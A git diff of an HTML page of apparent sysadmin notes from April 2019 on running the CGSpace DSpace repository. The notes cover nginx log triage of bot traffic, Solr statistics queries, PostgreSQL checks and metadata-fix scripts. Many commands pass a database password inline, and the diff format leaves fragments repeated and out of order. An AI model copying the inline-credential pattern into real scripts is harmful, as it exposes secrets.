    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
     
    • Very interesting to see this in the response:
    -
    "handles":["10568/89975","10568/89846"],
    -"handle":"10568/89975"
    +
    "handles":["10568/89975","10568/89846"],
    +"handle":"10568/89975"
     
    • On further inspection I see that the Altmetric explorer pages for each of these Handles is actually doing the right thing:
        diff --git a/docs/2019-04/index.html b/docs/2019-04/index.html index 8b6e3c676..6af1198ef 100644 --- a/docs/2019-04/index.html +++ b/docs/2019-04/index.html @@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d "/> - + @@ -163,16 +163,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
        4432 200
     
    • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
    • Apply country and region corrections and deletions on DSpace Test and CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
    -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
    +
    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
    +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
     

    2019-04-02

    • CTA says the Amazon IPs are AWS gateways for real user traffic
    • @@ -191,7 +191,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    -
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-04-03-orcid-ids.txt
    +
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-04-03-orcid-ids.txt
     
    • We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!
    • Next I will resolve all their names using my resolve-orcids.py script:
    • @@ -201,7 +201,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    • After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim
    • One user’s name has changed so I will update those using my fix-metadata-values.py script:
    -
    $ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
    +
    $ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
     
    • I created a pull request and merged the changes to the 5_x-prod branch (#417)
    • A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it’s still going:
    • @@ -210,7 +210,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    • Interestingly, there are 5666 occurences, and they are mostly for the 2018 core:
    -
    $ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
    +
    $ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
           1 
           3 http://localhost:8081/solr//statistics-2017
        5662 http://localhost:8081/solr//statistics-2018
    @@ -222,7 +222,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
     
  • Uptime Robot reported that CGSpace (linode18) went down tonight
  • I see there are lots of PostgreSQL connections:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
          10 dspaceCli
         250 dspaceWeb
    @@ -257,7 +257,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
     
     
  • Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         222 18.195.78.144
         245 207.46.13.58
         303 207.46.13.194
    @@ -268,7 +268,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
        1803 66.249.79.59
        2834 2a01:4f8:140:3192::2
        9623 45.5.184.72
    -# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          31 66.249.79.62
          41 207.46.13.210
          42 40.77.167.66
    @@ -287,14 +287,14 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
     
  • Their user agent is the one I added to the badbots list in nginx last week: “GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1”
  • They made 22,000 requests to Discover on this collection today alone (and it’s only 11AM):
  • -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "06/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "06/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
       22077 /handle/10568/72970/discover
     
    • Yesterday they made 43,000 requests and we actually blocked most of them:
    -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
       43631 /handle/10568/72970/discover
    -# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c 
    +# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c 
         142 200
       43489 503
     
      @@ -315,53 +315,53 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-03&rows=0&wt=json&indent=true'
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-03&rows=0&wt=json&indent=true'
     {
    -    "response": {
    -        "docs": [],
    -        "numFound": 96925,
    -        "start": 0
    +    "response": {
    +        "docs": [],
    +        "numFound": 96925,
    +        "start": 0
         },
    -    "responseHeader": {
    -        "QTime": 1,
    -        "params": {
    -            "fq": [
    -                "statistics_type:view",
    -                "bundleName:ORIGINAL",
    -                "dateYearMonth:2019-03"
    +    "responseHeader": {
    +        "QTime": 1,
    +        "params": {
    +            "fq": [
    +                "statistics_type:view",
    +                "bundleName:ORIGINAL",
    +                "dateYearMonth:2019-03"
                 ],
    -            "indent": "true",
    -            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    -            "rows": "0",
    -            "wt": "json"
    +            "indent": "true",
    +            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    +            "rows": "0",
    +            "wt": "json"
             },
    -        "status": 0
    +        "status": 0
         }
     }
     
    • Strangely I don’t see many hits in 2019-04:
    -
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-04&rows=0&wt=json&indent=true'
    +
    $ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-04&rows=0&wt=json&indent=true'
     {
    -    "response": {
    -        "docs": [],
    -        "numFound": 38,
    -        "start": 0
    +    "response": {
    +        "docs": [],
    +        "numFound": 38,
    +        "start": 0
         },
    -    "responseHeader": {
    -        "QTime": 1,
    -        "params": {
    -            "fq": [
    -                "statistics_type:view",
    -                "bundleName:ORIGINAL",
    -                "dateYearMonth:2019-04"
    +    "responseHeader": {
    +        "QTime": 1,
    +        "params": {
    +            "fq": [
    +                "statistics_type:view",
    +                "bundleName:ORIGINAL",
    +                "dateYearMonth:2019-04"
                 ],
    -            "indent": "true",
    -            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    -            "rows": "0",
    -            "wt": "json"
    +            "indent": "true",
    +            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
    +            "rows": "0",
    +            "wt": "json"
             },
    -        "status": 0
    +        "status": 0
         }
     }
     
      @@ -419,8 +419,8 @@ X-XSS-Protection: 1; mode=block
    • And from the server side, the nginx logs show:
    -
    78.x.x.x - - [07/Apr/2019:01:38:35 -0700] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "HTTPie/1.0.2"
    -78.x.x.x - - [07/Apr/2019:01:39:01 -0700] "HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 0 "-" "HTTPie/1.0.2"
    +
    78.x.x.x - - [07/Apr/2019:01:38:35 -0700] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "HTTPie/1.0.2"
    +78.x.x.x - - [07/Apr/2019:01:39:01 -0700] "HEAD /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 0 "-" "HTTPie/1.0.2"
     
    • So definitely the size of the transfer is more efficient with a HEAD, but I need to wait to see if these requests show up in Solr
        @@ -448,26 +448,26 @@ X-XSS-Protection: 1; mode=block
      • According to the DSpace 5.x Solr documentation the default commit time is after 15 minutes or 10,000 documents (see solrconfig.xml)
      • I looped some GET and HEAD requests to a bitstream on my local instance and after some time I see that they do register as downloads (even though they are internal):
      -
      $ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&fq=statistics_type%3Aview&fq=isInternal%3Atrue&rows=0&wt=json&indent=true'
      +
      $ http --print b 'http://localhost:8080/solr/statistics/select?q=type%3A0+AND+time%3A2019-04-07*&fq=statistics_type%3Aview&fq=isInternal%3Atrue&rows=0&wt=json&indent=true'
       {
      -    "response": {
      -        "docs": [],
      -        "numFound": 909,
      -        "start": 0
      +    "response": {
      +        "docs": [],
      +        "numFound": 909,
      +        "start": 0
           },
      -    "responseHeader": {
      -        "QTime": 0,
      -        "params": {
      -            "fq": [
      -                "statistics_type:view",
      -                "isInternal:true"
      +    "responseHeader": {
      +        "QTime": 0,
      +        "params": {
      +            "fq": [
      +                "statistics_type:view",
      +                "isInternal:true"
                   ],
      -            "indent": "true",
      -            "q": "type:0 AND time:2019-04-07*",
      -            "rows": "0",
      -            "wt": "json"
      +            "indent": "true",
      +            "q": "type:0 AND time:2019-04-07*",
      +            "rows": "0",
      +            "wt": "json"
               },
      -        "status": 0
      +        "status": 0
           }
       }
       
        @@ -501,7 +501,7 @@ X-XSS-Protection: 1; mode=block
      • According to the server logs there is actually not much going on right now:
      -
      # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           118 18.195.78.144
           128 207.46.13.219
           129 167.114.64.100
      @@ -512,7 +512,7 @@ X-XSS-Protection: 1; mode=block
           363 40.77.167.21
           740 2a01:4f8:140:3192::2
          4823 45.5.184.72
      -# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "07/Apr/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             3 66.249.79.62
             3 66.249.83.196
             4 207.46.13.86
      @@ -529,7 +529,7 @@ X-XSS-Protection: 1; mode=block
       
    • 2408:8214:7a00:868f:7c1e:e0f3:20c6:c142 is some stupid Chinese bot making malicious POST requests
    • There are free database connections in the pool:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           7 dspaceCli
          23 dspaceWeb
    @@ -560,7 +560,7 @@ X-XSS-Protection: 1; mode=block
     
  • See the OpenRefine variables documentation for more notes about the recon object
  • I also noticed a handful of errors in our current list of affiliations so I corrected them:
  • -
    $ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
    +
    $ ./fix-metadata-values.py -i 2019-04-08-fix-13-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
     
    • We should create a new list of affiliations to update our controlled vocabulary again
    • I dumped a list of the top 1500 affiliations:
    • @@ -570,20 +570,20 @@ COPY 1500
    • Fix a few more messed up affiliations that have return characters in them (use Ctrl-V Ctrl-M to re-create control character):
    -
    dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
    -dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural  and Livestock  Research^M%';
    +
    dspace=# UPDATE metadatavalue SET text_value='International Institute for Environment and Development' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'International Institute^M%';
    +dspace=# UPDATE metadatavalue SET text_value='Kenya Agriculture and Livestock Research Organization' WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE 'Kenya Agricultural  and Livestock  Research^M%';
     
    • I noticed a bunch of subjects and affiliations that use stylized apostrophes so I will export those and then batch update them:
    -
    dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%’%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
    +
    dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 AND text_value LIKE '%’%') to /tmp/2019-04-08-affiliations-apostrophes.csv WITH CSV HEADER;
     COPY 60
    -dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%’%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
    +dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 57 AND text_value LIKE '%’%') to /tmp/2019-04-08-subject-apostrophes.csv WITH CSV HEADER;
     COPY 20
     
    • I cleaned them up in OpenRefine and then applied the fixes on CGSpace and DSpace Test:
    -
    $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
    -$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
    +
    $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-60-affiliations-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -d
    +$ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
     
    • UptimeRobot said that CGSpace (linode18) went down tonight
        @@ -592,7 +592,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-04-08-fix-20-subject-apostrophes.csv -db
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           7 dspaceCli
         250 dspaceWeb
    @@ -609,7 +609,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
  • Linode Support still didn’t respond to my ticket from yesterday, so I attached a new output of iostat 1 10 and asked them to move the VM to a less busy host
  • The web server logs are not very busy:
  • -
    # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         124 40.77.167.135
         135 95.108.181.88
         139 157.55.39.206
    @@ -620,7 +620,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
         457 157.55.39.164
         457 40.77.167.132
        3822 45.5.184.72
    -# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "08/Apr/2019:(17|18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           5 129.0.79.206
           5 41.205.240.21
           7 207.46.13.95
    @@ -636,7 +636,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
  • Linode sent an alert that CGSpace (linode18) was 440% CPU for the last two hours this morning
  • Here are the top IPs in the web server logs around that time:
  • -
    # zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          18 66.249.79.139
          21 157.55.39.160
          29 66.249.79.137
    @@ -647,7 +647,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
        1166 45.5.184.72
        4251 45.5.186.2
        4895 205.186.128.185
    -# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E "09/Apr/2019:(06|07|08)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         200 144.48.242.108
         202 207.46.13.185
         206 18.194.46.84
    @@ -665,7 +665,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
    • Database connection usage looks fine:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
           5 dspaceApi
           7 dspaceCli
          11 dspaceWeb
    @@ -683,15 +683,15 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exe
     
  • Abenet pointed out a possibility of validating funders against the CrossRef API
  • Note that if you use HTTPS and specify a contact address in the API request you have less likelihood of being blocked
  • -
    $ http 'https://api.crossref.org/funders?query=mercator&mailto=me@cgiar.org'
    +
    $ http 'https://api.crossref.org/funders?query=mercator&mailto=me@cgiar.org'
     
    • Otherwise, they provide the funder data in CSV and RDF format
    • I did a quick test with the recent IITA records against reconcile-csv in OpenRefine and it matched a few, but the ones that didn’t match will need a human to go and do some manual checking and informed decision making…
    • If I want to write a script for this I could use the Python habanero library:
    from habanero import Crossref
    -cr = Crossref(mailto="me@cgiar.org")
    -x = cr.funders(query = "mercator")
    +cr = Crossref(mailto="me@cgiar.org")
    +x = cr.funders(query = "mercator")
     

    2019-04-11

    • Continue proofing IITA’s last round of batch uploads from March on DSpace Test (20193rd.xls) @@ -720,8 +720,8 @@ x = cr.funders(query = "mercator")
    • I captured a few general corrections and deletions for AGROVOC subjects while looking at IITA’s records, so I applied them to DSpace Test and CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
    -$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
    +
    $ ./fix-metadata-values.py -i /tmp/2019-04-11-fix-14-subjects.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d
    +$ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d
     
    • Answer more questions about DOIs and Altmetric scores from WLE
    • Answer more questions about DOIs and Altmetric scores from IWMI @@ -753,7 +753,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
      • Change DSpace Test (linode19) to use the Java GC tuning from the Solr 4.10.4 startup script:
      -
      GC_TUNE="-XX:NewRatio=3 \
      +
      GC_TUNE="-XX:NewRatio=3 \
           -XX:SurvivorRatio=4 \
           -XX:TargetSurvivorRatio=90 \
           -XX:MaxTenuringThreshold=8 \
      @@ -766,7 +766,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-04-11-delete-6-subjects.csv -db dspac
           -XX:CMSInitiatingOccupancyFraction=50 \
           -XX:CMSMaxAbortablePrecleanTime=6000 \
           -XX:+CMSParallelRemarkEnabled \
      -    -XX:+ParallelRefProcEnabled"
      +    -XX:+ParallelRefProcEnabled"
       
      • I need to remember to check the Munin JVM graphs in a few days
      • It might be placebo, but the site does feel snappier…
      • @@ -791,14 +791,14 @@ import re import urllib import urllib2 -handle = re.findall('[0-9]+/[0-9]+', value) +handle = re.findall('[0-9]+/[0-9]+', value) -url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0] +url = 'https://cgspace.cgiar.org/rest/handle/' + handle[0] req = urllib2.Request(url) -req.add_header('User-agent', 'Alan Python bot') +req.add_header('User-agent', 'Alan Python bot') res = urllib2.urlopen(req) data = json.load(res) -item_id = data['id'] +item_id = data['id'] return item_id
        @@ -1053,7 +1053,7 @@ TCP window size: 85.0 KByte (default)
    • Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):
    -
    $ grep -c 'Falling back to request address' dspace.log.2019-04-20
    +
    $ grep -c 'Falling back to request address' dspace.log.2019-04-20
     dspace.log.2019-04-20:1515
     
    • I will fix it in dspace/config/modules/oai.cfg
    • @@ -1098,7 +1098,7 @@ dspace.log.2019-04-20:1515
    -
    $ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv > /tmp/iita.csv
    +
    $ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv > /tmp/iita.csv
     
    • Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017
        @@ -1108,7 +1108,7 @@ dspace.log.2019-04-20:1515
    -
